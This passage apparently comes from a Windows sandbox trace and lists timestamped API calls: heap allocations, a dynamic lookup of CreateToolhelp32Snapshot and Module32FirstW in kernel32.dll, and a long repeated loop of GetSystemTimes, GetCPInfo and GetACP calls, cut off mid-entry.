GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.531] GetLastError () returned 0x0 [0044.531] SetLastError (dwErrCode=0x0) [0044.531] GetLastError () returned 0x0 [0044.531] SetLastError (dwErrCode=0x0) [0044.531] GetLastError () returned 0x0 [0044.531] SetLastError (dwErrCode=0x0) [0044.531] GetLastError () returned 0x0 [0044.531] SetLastError (dwErrCode=0x0) [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x98) returned 0x231a00 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1f) returned 0x231aa0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x231ac8 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x37) returned 0x231b08 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x231b48 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x31) returned 0x231b90 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x17) returned 0x231bd0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x231bf0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x14) returned 0x231c20 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xd) returned 0x231c40 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x25) returned 0x231c58 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x39) returned 0x231c88 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x18) returned 0x231cd0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x17) returned 0x231cf0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xe) returned 0x231d10 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x69) returned 0x231d28 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x231da0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1b) returned 0x231de8 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1d) returned 0x231e10 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x231e38 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x12) returned 0x231e88 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x18) returned 0x231ea8 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1b) returned 0x231ec8 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x231ef0 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x29) returned 0x231f20 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1e) returned 0x231f58 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x41) returned 0x231f80 [0044.531] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x17) returned 0x231fd0 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xf) returned 0x231ff0 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x16) returned 0x232008 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2a) returned 0x232028 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x29) returned 0x232060 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x15) returned 0x232098 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1e) returned 0x2320b8 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2a) returned 0x2320e0 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x12) returned 0x232118 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x18) returned 0x232138 [0044.532] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x46) returned 0x232158 [0044.532] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2311f8 | out: hHeap=0x230000) returned 1 [0044.533] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2321a8 [0044.533] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x80) returned 0x2311f8 [0044.533] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e69) returned 0x0 [0044.533] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x2311f8) returned 0x80 [0044.533] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.534] SetLastError (dwErrCode=0x0) [0044.534] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.535] GetLastError () returned 0x0 [0044.535] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] SetLastError (dwErrCode=0x0) [0044.536] GetLastError () returned 0x0 [0044.536] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0044.536] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0044.537] GetProcAddress (hModule=0x76c20000, lpProcName="Module32FirstW") returned 0x76c579f9 [0044.537] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0044.538] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0044.538] PeekMessageA (in: lpMsg=0x18fa38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa38) returned 0 [0044.538] GetTickCount () returned 0x1144b43 [0044.538] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.539] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.539] GetACP () returned 0x4e4 [0044.539] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.540] GetACP () returned 0x4e4 [0044.540] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.540] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.541] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.541] GetACP () returned 0x4e4 [0044.541] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.542] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.542] GetACP () returned 0x4e4 [0044.542] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.543] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.543] GetACP () returned 0x4e4 [0044.543] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.544] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.544] GetACP () returned 0x4e4 [0044.544] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.544] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.544] GetACP () returned 0x4e4 [0044.544] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, 